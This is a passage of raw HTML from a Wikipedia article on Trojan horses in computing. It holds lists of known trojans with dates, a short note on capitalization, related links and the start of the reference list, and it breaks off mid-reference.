href="/wiki/FinFisher" title="FinFisher">FinFisher</a> – Lench IT solutions / Gamma International</li> <li><a href="/wiki/Hacking_Team#Products_and_capabilities" class="mw-redirect" title="Hacking Team">DaVinci / Galileo RCS</a> – HackingTeam</li> <li><a href="/wiki/Magic_Lantern_(spyware)" title="Magic Lantern (spyware)">Magic Lantern</a> – FBI</li> <li><a href="/wiki/2020_United_States_federal_government_data_breach" title="2020 United States federal government data breach">SUNBURST</a> – <a href="/wiki/Foreign_Intelligence_Service_(Russia)" title="Foreign Intelligence Service (Russia)">SVR</a>/<a href="/wiki/Cozy_Bear" title="Cozy Bear">Cozy Bear</a> (suspected)</li> <li><a href="/wiki/Tailored_Access_Operations#QUANTUM_attacks" title="Tailored Access Operations">TAO QUANTUM/FOXACID</a> – NSA</li> <li><a href="/wiki/WARRIOR_PRIDE" title="WARRIOR PRIDE">WARRIOR PRIDE</a> – GCHQ</li></ul> <div class="mw-heading mw-heading3"><h3 id="Publicly_available">Publicly available</h3><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=7" title="Edit section: Publicly available"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <ul><li><a href="/wiki/EGABTR" title="EGABTR">EGABTR</a> – late 1980s</li> <li><a href="/wiki/Netbus" class="mw-redirect" title="Netbus">Netbus</a> – 1998 (published)<sup id="cite_ref-21" class="reference"><a href="#cite_note-21"><span class="cite-bracket">&#91;</span>20<span class="cite-bracket">&#93;</span></a></sup></li> <li><a href="/wiki/Sub7" title="Sub7">Sub7</a> by Mobman – 1999 (published)</li> <li><a href="/wiki/Back_Orifice" title="Back Orifice">Back Orifice</a> – 1998 (published)</li> <li><a href="/w/index.php?title=Y3K&amp;action=edit&amp;redlink=1" class="new" title="Y3K (page does not exist)">Y3K</a> by Tselentis brothers – 2000 (published)</li> <li><a href="/wiki/Beast_(Trojan_horse)" title="Beast (Trojan horse)">Beast</a> – 2002 (published)</li> <li><a href="/wiki/Bifrost_(Trojan_horse)" title="Bifrost (Trojan horse)">Bifrost Trojan</a> – 2004 (published)</li> <li><a href="/wiki/DarkComet" title="DarkComet">DarkComet</a> – 2008-2012 (published)</li> <li><a href="/wiki/Blackhole_exploit_kit" title="Blackhole exploit kit">Blackhole exploit kit</a> – 2012 (published)</li> <li><a href="/wiki/Gh0st_RAT" class="mw-redirect" title="Gh0st RAT">Gh0st RAT</a> – 2009 (published)</li> <li><a href="/wiki/MiniPanzer_and_MegaPanzer" title="MiniPanzer and MegaPanzer">MegaPanzer BundesTrojaner</a> – 2009 (published)<sup id="cite_ref-22" class="reference"><a href="#cite_note-22"><span class="cite-bracket">&#91;</span>21<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-23" class="reference"><a href="#cite_note-23"><span class="cite-bracket">&#91;</span>22<span class="cite-bracket">&#93;</span></a></sup></li> <li><a href="/wiki/MEMZ" title="MEMZ">MEMZ</a> by Leurak – 2016 (published)</li></ul> <div class="mw-heading mw-heading3"><h3 id="Detected_by_security_researchers">Detected by security researchers</h3><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=8" title="Edit section: Detected by security researchers"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <ul><li><a href="/wiki/Twelve_Tricks" title="Twelve Tricks">Twelve Tricks</a> – 1990</li> <li><a href="/wiki/Clickbot.A" title="Clickbot.A">Clickbot.A</a> – 2006 (discovered)</li> <li><a href="/wiki/Zeus_(Trojan_horse)" class="mw-redirect" title="Zeus (Trojan horse)">Zeus</a> – 2007 (discovered)</li> <li><a href="/wiki/Trojan_BackDoor.Flashback" class="mw-redirect" title="Trojan BackDoor.Flashback">Flashback Trojan</a> – 2011 (discovered)</li> <li><a href="/wiki/ZeroAccess_botnet" title="ZeroAccess botnet">ZeroAccess</a> – 2011 (discovered)</li> <li><a href="/wiki/Koobface" title="Koobface">Koobface</a> – 2008 (discovered)</li> <li><a href="/wiki/Vundo" title="Vundo">Vundo</a> – 2009 (discovered)</li> <li><a href="/wiki/Coreflood" title="Coreflood">Coreflood</a> – 2010 (discovered)</li> <li><a href="/wiki/Tiny_Banker_Trojan" title="Tiny Banker Trojan">Tiny Banker Trojan</a> – 2012 (discovered)</li> <li>SOVA – 2022 (discovered)<sup id="cite_ref-24" class="reference"><a href="#cite_note-24"><span class="cite-bracket">&#91;</span>23<span class="cite-bracket">&#93;</span></a></sup></li> <li><a href="/wiki/Shedun" title="Shedun">Shedun</a> Android malware – 2015 (discovered)<sup id="cite_ref-25" class="reference"><a href="#cite_note-25"><span class="cite-bracket">&#91;</span>24<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-26" class="reference"><a href="#cite_note-26"><span class="cite-bracket">&#91;</span>25<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-27" class="reference"><a href="#cite_note-27"><span class="cite-bracket">&#91;</span>26<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-28" class="reference"><a href="#cite_note-28"><span class="cite-bracket">&#91;</span>27<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-29" class="reference"><a href="#cite_note-29"><span class="cite-bracket">&#91;</span>28<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-30" class="reference"><a href="#cite_note-30"><span class="cite-bracket">&#91;</span>29<span class="cite-bracket">&#93;</span></a></sup></li></ul> <div class="mw-heading mw-heading2"><h2 id="Capitalization">Capitalization</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=9" title="Edit section: Capitalization"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <p>The computer term "Trojan horse" is derived from the legendary <a href="/wiki/Trojan_Horse" title="Trojan Horse">Trojan Horse</a> of the ancient city of <a href="/wiki/Troy" title="Troy">Troy</a>. For this reason "Trojan" is often capitalized. However, while <a href="/wiki/Style_guide" title="Style guide">style guides</a> and dictionaries differ, many suggest a lower case "trojan" for normal use.<sup id="cite_ref-31" class="reference"><a href="#cite_note-31"><span class="cite-bracket">&#91;</span>30<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-32" class="reference"><a href="#cite_note-32"><span class="cite-bracket">&#91;</span>31<span class="cite-bracket">&#93;</span></a></sup> </p> <div class="mw-heading mw-heading2"><h2 id="See_also">See also</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=10" title="Edit section: See also"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <style data-mw-deduplicate="TemplateStyles:r1184024115">.mw-parser-output .div-col{margin-top:0.3em;column-width:30em}.mw-parser-output .div-col-small{font-size:90%}.mw-parser-output .div-col-rules{column-rule:1px solid #aaa}.mw-parser-output .div-col dl,.mw-parser-output .div-col ol,.mw-parser-output .div-col ul{margin-top:0}.mw-parser-output .div-col li,.mw-parser-output .div-col dd{page-break-inside:avoid;break-inside:avoid-column}</style><div class="div-col"> <ul><li><a href="/wiki/Computer_security" title="Computer security">Computer security</a>&#160;– Protection of computer systems from information disclosure, theft or damage</li> <li><a href="/wiki/Cuckoo%27s_egg_(metaphor)" title="Cuckoo&#39;s egg (metaphor)"><i>Cuckoo's egg</i> (metaphor)</a>&#160;– Metaphor for brood parasitism</li> <li><a href="/wiki/Cyber_spying" title="Cyber spying">Cyber spying</a>&#160;– Obtaining secrets using the Internet</li> <li><a href="/wiki/Dancing_pigs" title="Dancing pigs">Dancing pigs</a>&#160;– Users' disregard for IT security</li> <li><a href="/wiki/Exploit_(computer_security)" title="Exploit (computer security)">Exploit (computer security)</a>&#160;– Method of attack on computer systems</li> <li><a href="/wiki/Industrial_espionage" title="Industrial espionage">Industrial espionage</a>&#160;– Use of espionage for commercial purposes rather than security</li> <li><a href="/wiki/Hardware_Trojan" title="Hardware Trojan">Hardware Trojan</a>&#160;– Malware embedded in hardware; harder to detect and fix than software vulnerabilities</li> <li><a href="/wiki/Phishing" title="Phishing">Phishing</a>&#160;– Form of social engineering</li> <li><a href="/wiki/Principle_of_least_privilege" title="Principle of least privilege">Principle of least privilege</a>&#160;– Security by granting only essential access</li> <li><a href="/wiki/Privacy-invasive_software" title="Privacy-invasive software">Privacy-invasive software</a>&#160;– Computer software ignoring user privacy with a commercial intent</li> <li><a href="/wiki/Remote_administration" title="Remote administration">Remote administration</a>&#160;– Control &amp; use of a computer from remote location</li> <li><a href="/wiki/Remote_administration_software" class="mw-redirect" title="Remote administration software">Remote administration software</a>&#160;– Desktop run remotely from local device<span style="display:none" class="category-annotation-with-redirected-description">Pages displaying short descriptions of redirect targets</span></li> <li><a href="/wiki/Reverse_connection" title="Reverse connection">Reverse connection</a>&#160;– Network connection type ypass firewall restrictions on open ports</li> <li><a href="/wiki/Rogue_security_software" title="Rogue security software">Rogue security software</a>&#160;– Form of malicious software</li> <li><a href="/wiki/Scammers" class="mw-redirect" title="Scammers">Scammers</a>&#160;– Attempt to defraud a person or group<span style="display:none" class="category-annotation-with-redirected-description">Pages displaying short descriptions of redirect targets</span></li> <li><a href="/wiki/Technical_support_scam" title="Technical support scam">Technical support scam</a>&#160;– Type of fraud and confidence trick</li> <li><a href="/wiki/Timeline_of_computer_viruses_and_worms" title="Timeline of computer viruses and worms">Timeline of computer viruses and worms</a>&#160;– Computer malware timeline</li> <li><a href="/wiki/Zombie_(computer_science)" class="mw-redirect" title="Zombie (computer science)">Zombie (computer science)</a>&#160;– Compromised computer used for malicious tasks on a network<span style="display:none" class="category-annotation-with-redirected-description">Pages displaying short descriptions of redirect targets</span></li></ul> </div> <div class="mw-heading mw-heading2"><h2 id="References">References</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=11" title="Edit section: References"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <style data-mw-deduplicate="TemplateStyles:r1239543626">.mw-parser-output .reflist{margin-bottom:0.5em;list-style-type:decimal}@media screen{.mw-parser-output .reflist{font-size:90%}}.mw-parser-output .reflist .references{font-size:100%;margin-bottom:0;list-style-type:inherit}.mw-parser-output .reflist-columns-2{column-width:30em}.mw-parser-output .reflist-columns-3{column-width:25em}.mw-parser-output .reflist-columns{margin-top:0.3em}.mw-parser-output .reflist-columns ol{margin-top:0}.mw-parser-output .reflist-columns li{page-break-inside:avoid;break-inside:avoid-column}.mw-parser-output .reflist-upper-alpha{list-style-type:upper-alpha}.mw-parser-output .reflist-upper-roman{list-style-type:upper-roman}.mw-parser-output .reflist-lower-alpha{list-style-type:lower-alpha}.mw-parser-output .reflist-lower-greek{list-style-type:lower-greek}.mw-parser-output .reflist-lower-roman{list-style-type:lower-roman}</style><div class="reflist"> <div class="mw-references-wrap mw-references-columns"><ol class="references"> <li id="cite_note-1"><span class="mw-cite-backlink"><b><a href="#cite_ref-1">^</a></b></span> <span class="reference-text"><style data-mw-deduplicate="TemplateStyles:r1238218222">.mw-parser-output cite.citation{font-style:inherit;word-wrap:break-word}.mw-parser-output .citation q{quotes:"\"""\"""'""'"}.mw-parser-output .citation:target{background-color:rgba(0,127,255,0.133)}.mw-parser-output .id-lock-free.id-lock-free a{background:url("//upload.wikimedia.org/wikipedia/commons/6/65/Lock-green.svg")right 0.1em center/9px no-repeat}.mw-parser-output .id-lock-limited.id-lock-limited a,.mw-parser-output .id-lock-registration.id-lock-registration a{background:url("//upload.wikimedia.org/wikipedia/commons/d/d6/Lock-gray-alt-2.svg")right 0.1em center/9px no-repeat}.mw-parser-output .id-lock-subscription.id-lock-subscription a{background:url("//upload.wikimedia.org/wikipedia/commons/a/aa/Lock-red-alt-2.svg")right 0.1em center/9px no-repeat}.mw-parser-output .cs1-ws-icon a{background:url("//upload.wikimedia.org/wikipedia/commons/4/4c/Wikisource-logo.svg")right 0.1em center/12px no-repeat}body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-free a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-limited a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-registration a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-subscription a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .cs1-ws-icon a{background-size:contain;padding:0 1em 0 0}.mw-parser-output .cs1-code{color:inherit;background:inherit;border:none;padding:inherit}.mw-parser-output .cs1-hidden-error{display:none;color:var(--color-error,#d33)}.mw-parser-output .cs1-visible-error{color:var(--color-error,#d33)}.mw-parser-output .cs1-maint{display:none;color:#085;margin-left:0.3em}.mw-parser-output .cs1-kern-left{padding-left:0.2em}.mw-parser-output .cs1-kern-right{padding-right:0.2em}.mw-parser-output .citation .mw-selflink{font-weight:inherit}@media screen{.mw-parser-output .cs1-format{font-size:95%}html.skin-theme-clientpref-night .mw-parser-output .cs1-maint{color:#18911f}}@media screen and (prefers-color-scheme:dark){html.skin-theme-clientpref-os .mw-parser-output .cs1-maint{color:#18911f}}</style><cite class="citation web cs1"><a rel="nofollow" class="external text" href="http://www.techterms.com/definition/trojanhorse">"Trojan Horse Definition"</a><span class="reference-accessdate">. Retrieved <span class="nowrap">April 5,</span> 2012</span>. <q>Greek soldiers, unable to penetrate the defenses of the city of Troy during a years-long war, presented the city with a peace offering of a large wooden horse.</q></cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=Trojan+Horse+Definition&amp;rft_id=http%3A%2F%2Fwww.techterms.com%2Fdefinition%2Ftrojanhorse&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-2"><span class="mw-cite-backlink"><b><a href="#cite_ref-2">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://knowledge.broadcom.com/external/article?legacyId=tech98539">"Difference between viruses, worms, and trojans"</a>. <i>Symantec Security Center</i>. Broadcom Inc. <a rel="nofollow" class="external text" href="https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&amp;id=TECH98539#selection-3435.1-3585.1">Archived</a> from the original on August 19, 2013<span class="reference-accessdate">. Retrieved <span class="nowrap">March 29,</span> 2020</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=Symantec+Security+Center&amp;rft.atitle=Difference+between+viruses%2C+worms%2C+and+trojans&amp;rft_id=https%3A%2F%2Fknowledge.broadcom.com%2Fexternal%2Farticle%3FlegacyId%3Dtech98539&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-3"><span class="mw-cite-backlink"><b><a href="#cite_ref-3">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html">"VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)"</a>. October 9, 1995. Archived from <a rel="nofollow" class="external text" href="http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html">the original</a> on August 5, 2020<span class="reference-accessdate">. Retrieved <span class="nowrap">September 16,</span> 2019</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=VIRUS-L%2Fcomp.virus+Frequently+Asked+Questions+%28FAQ%29+v2.00+%28Question+B3%3A+What+is+a+Trojan+Horse%3F%29&amp;rft.date=1995-10-09&amp;rft_id=http%3A%2F%2Ffaqs.cs.uu.nl%2Fna-dir%2Fcomputer-virus%2Ffaq.html&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-4"><span class="mw-cite-backlink"><b><a href="#cite_ref-4">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFThompsonRitchie" class="citation web cs1">Thompson, Ken; Ritchie, Dennis M. <a rel="nofollow" class="external text" href="https://www.bell-labs.com/usr/dmr/www/man21.pdf">"Unix Programmer's Manual, November 3, 1971"</a> <span class="cs1-format">(PDF)</span>. p.&#160;5<span class="reference-accessdate">. Retrieved <span class="nowrap">March 28,</span> 2020</span>. <q>Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other's files.</q></cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=Unix+Programmer%27s+Manual%2C+November+3%2C+1971&amp;rft.pages=5&amp;rft.aulast=Thompson&amp;rft.aufirst=Ken&amp;rft.au=Ritchie%2C+Dennis+M.&amp;rft_id=https%3A%2F%2Fwww.bell-labs.com%2Fusr%2Fdmr%2Fwww%2Fman21.pdf&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-Multics-5"><span class="mw-cite-backlink"><b><a href="#cite_ref-Multics_5-0">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFKargerSchell" class="citation cs2">Karger, P.A.; Schell, R.R., <a rel="nofollow" class="external text" href="https://web.archive.org/web/20110709024412/http://csrc.nist.gov/publications/history/karg74.pdf">"Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193"</a> <span class="cs1-format">(PDF)</span>, <i>HQ Electronic Systems Division: Hanscom AFB, MA</i>, <b>II</b>, archived from <a rel="nofollow" class="external text" href="http://csrc.nist.gov/publications/history/karg74.pdf">the original</a> <span class="cs1-format">(PDF)</span> on July 9, 2011<span class="reference-accessdate">, retrieved <span class="nowrap">December 24,</span> 2017</span></cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=article&amp;rft.jtitle=HQ+Electronic+Systems+Division%3A+Hanscom+AFB%2C+MA&amp;rft.atitle=Multics+Security+Evaluation%3A+Vulnerability+Analysis+%2C+ESD-TR-74-193&amp;rft.volume=II&amp;rft.aulast=Karger&amp;rft.aufirst=P.A.&amp;rft.au=Schell%2C+R.R.&amp;rft_id=http%3A%2F%2Fcsrc.nist.gov%2Fpublications%2Fhistory%2Fkarg74.pdf&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-6"><span class="mw-cite-backlink"><b><a href="#cite_ref-6">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFKen_Thompson1984" class="citation journal cs1">Ken Thompson (1984). <a rel="nofollow" class="external text" href="https://dl.acm.org/ft_gateway.cfm?id=1283940&amp;type=pdf">"Reflection on Trusting Trust"</a>. <i>Commun. ACM</i>. <b>27</b> (8): 761–763. <a href="/wiki/Doi_(identifier)" class="mw-redirect" title="Doi (identifier)">doi</a>:<span class="id-lock-free" title="Freely accessible"><a rel="nofollow" class="external text" href="https://doi.org/10.1145%2F358198.358210">10.1145/358198.358210</a></span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=article&amp;rft.jtitle=Commun.+ACM&amp;rft.atitle=Reflection+on+Trusting+Trust&amp;rft.volume=27&amp;rft.issue=8&amp;rft.pages=761-763&amp;rft.date=1984&amp;rft_id=info%3Adoi%2F10.1145%2F358198.358210&amp;rft.au=Ken+Thompson&amp;rft_id=https%3A%2F%2Fdl.acm.org%2Fft_gateway.cfm%3Fid%3D1283940%26type%3Dpdf&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span>.</span> </li> <li id="cite_note-7"><span class="mw-cite-backlink"><b><a href="#cite_ref-7">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFPaul_A._KargerRoger_R._Schell2002" class="citation cs2">Paul A. Karger; Roger R. Schell (2002), <a rel="nofollow" class="external text" href="https://www.acsac.org/2002/papers/classic-multics.pdf">"Thirty Years Later: Lessons from the Multics Security Evaluation"</a> <span class="cs1-format">(PDF)</span>, <i>ACSAC</i>: 119–126</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=article&amp;rft.jtitle=ACSAC&amp;rft.atitle=Thirty+Years+Later%3A+Lessons+from+the+Multics+Security+Evaluation&amp;rft.pages=119-126&amp;rft.date=2002&amp;rft.au=Paul+A.+Karger&amp;rft.au=Roger+R.+Schell&amp;rft_id=https%3A%2F%2Fwww.acsac.org%2F2002%2Fpapers%2Fclassic-multics.pdf&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-8"><span class="mw-cite-backlink"><b><a href="#cite_ref-8">^</a></b></span> <span class="reference-text">Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: <link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFKen_Thompson1989" class="citation cs2">Ken Thompson (November 1989), "On Trusting Trust.", <i>Unix Review</i>, <b>7</b> (11): 70–74</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=article&amp;rft.jtitle=Unix+Review&amp;rft.atitle=On+Trusting+Trust.&amp;rft.volume=7&amp;rft.issue=11&amp;rft.pages=70-74&amp;rft.date=1989-11&amp;rft.au=Ken+Thompson&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-Crapanzano-9"><span class="mw-cite-backlink"><b><a href="#cite_ref-Crapanzano_9-0">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFCrapanzano2003" class="citation report cs1">Crapanzano, Jamie (2003). <a rel="nofollow" class="external text" href="http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953">Deconstructing SubSeven, the Trojan Horse of Choice</a> (Report). <a href="/wiki/SANS_Institute" title="SANS Institute">SANS Institute</a><span class="reference-accessdate">. Retrieved <span class="nowrap">May 10,</span> 2021</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=report&amp;rft.btitle=Deconstructing+SubSeven%2C+the+Trojan+Horse+of+Choice&amp;rft.pub=SANS+Institute&amp;rft.date=2003&amp;rft.aulast=Crapanzano&amp;rft.aufirst=Jamie&amp;rft_id=http%3A%2F%2Fwww.sans.org%2Freading_room%2Fwhitepapers%2Fmalicious%2Fdeconstructing_subseven_the_trojan_horse_of_choice_953&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-cupa-10"><span class="mw-cite-backlink">^ <a href="#cite_ref-cupa_10-0"><sup><i><b>a</b></i></sup></a> <a href="#cite_ref-cupa_10-1"><sup><i><b>b</b></i></sup></a></span> <span class="reference-text">Basil Cupa, <a rel="nofollow" class="external text" href="http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf">Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)</a>, LISS 2013, pp. 419–428</span> </li> <li id="cite_note-11"><span class="mw-cite-backlink"><b><a href="#cite_ref-11">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html">"Häufig gestellte Fragen (Frequently Asked Questions)"</a>. Federal Department of Justice and Police. Archived from <a rel="nofollow" class="external text" href="http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html">the original</a> on May 6, 2013.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=H%C3%A4ufig+gestellte+Fragen+%28Frequently+Asked+Questions%29&amp;rft.pub=Federal+Department+of+Justice+and+Police&amp;rft_id=http%3A%2F%2Fwww.ejpd.admin.ch%2Fcontent%2Fejpd%2Fde%2Fhome%2Fthemen%2Fsicherheit%2Fueberwachung_des_post-%2Ffaq_vuepf.faq_3.html&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-tech-12"><span class="mw-cite-backlink"><b><a href="#cite_ref-tech_12-0">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFDunn2009" class="citation web cs1">Dunn, John (August 27, 2009). <a rel="nofollow" class="external text" href="https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/">"Swiss coder publicises government spy Trojan"</a>. <i><a href="/wiki/International_Data_Group" title="International Data Group">TechWorld</a></i>. Archived from <a rel="nofollow" class="external text" href="http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/">the original</a> on January 26, 2014<span class="reference-accessdate">. Retrieved <span class="nowrap">January 10,</span> 2021</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=TechWorld&amp;rft.atitle=Swiss+coder+publicises+government+spy+Trojan&amp;rft.date=2009-08-27&amp;rft.aulast=Dunn&amp;rft.aufirst=John&amp;rft_id=http%3A%2F%2Fnews.techworld.com%2Fsecurity%2F3200593%2Fswiss-coder-publicises-government-spy-trojan%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-13"><span class="mw-cite-backlink"><b><a href="#cite_ref-13">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466">"German federal police use trojan virus to evade phone encryption"</a>. <i><a href="/wiki/Deutsche_Welle" title="Deutsche Welle">DW</a></i><span class="reference-accessdate">. Retrieved <span class="nowrap">April 14,</span> 2018</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=DW&amp;rft.atitle=German+federal+police+use+trojan+virus+to+evade+phone+encryption&amp;rft_id=http%3A%2F%2Fwww.dw.com%2Fen%2Fgerman-federal-police-use-trojan-virus-to-evade-phone-encryption%2Fa-42328466&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-14"><span class="mw-cite-backlink"><b><a href="#cite_ref-14">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html">"BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends"</a>. <i><a href="/wiki/Bitdefender" title="Bitdefender">BitDefender</a></i>. Archived from <a rel="nofollow" class="external text" href="http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html">the original</a> on August 8, 2009<span class="reference-accessdate">. Retrieved <span class="nowrap">March 27,</span> 2020</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=BitDefender&amp;rft.atitle=BitDefender+Malware+and+Spam+Survey+finds+E-Threats+Adapting+to+Online+Behavioral+Trends&amp;rft_id=http%3A%2F%2Fnews.bitdefender.com%2FNW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-15"><span class="mw-cite-backlink"><b><a href="#cite_ref-15">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" 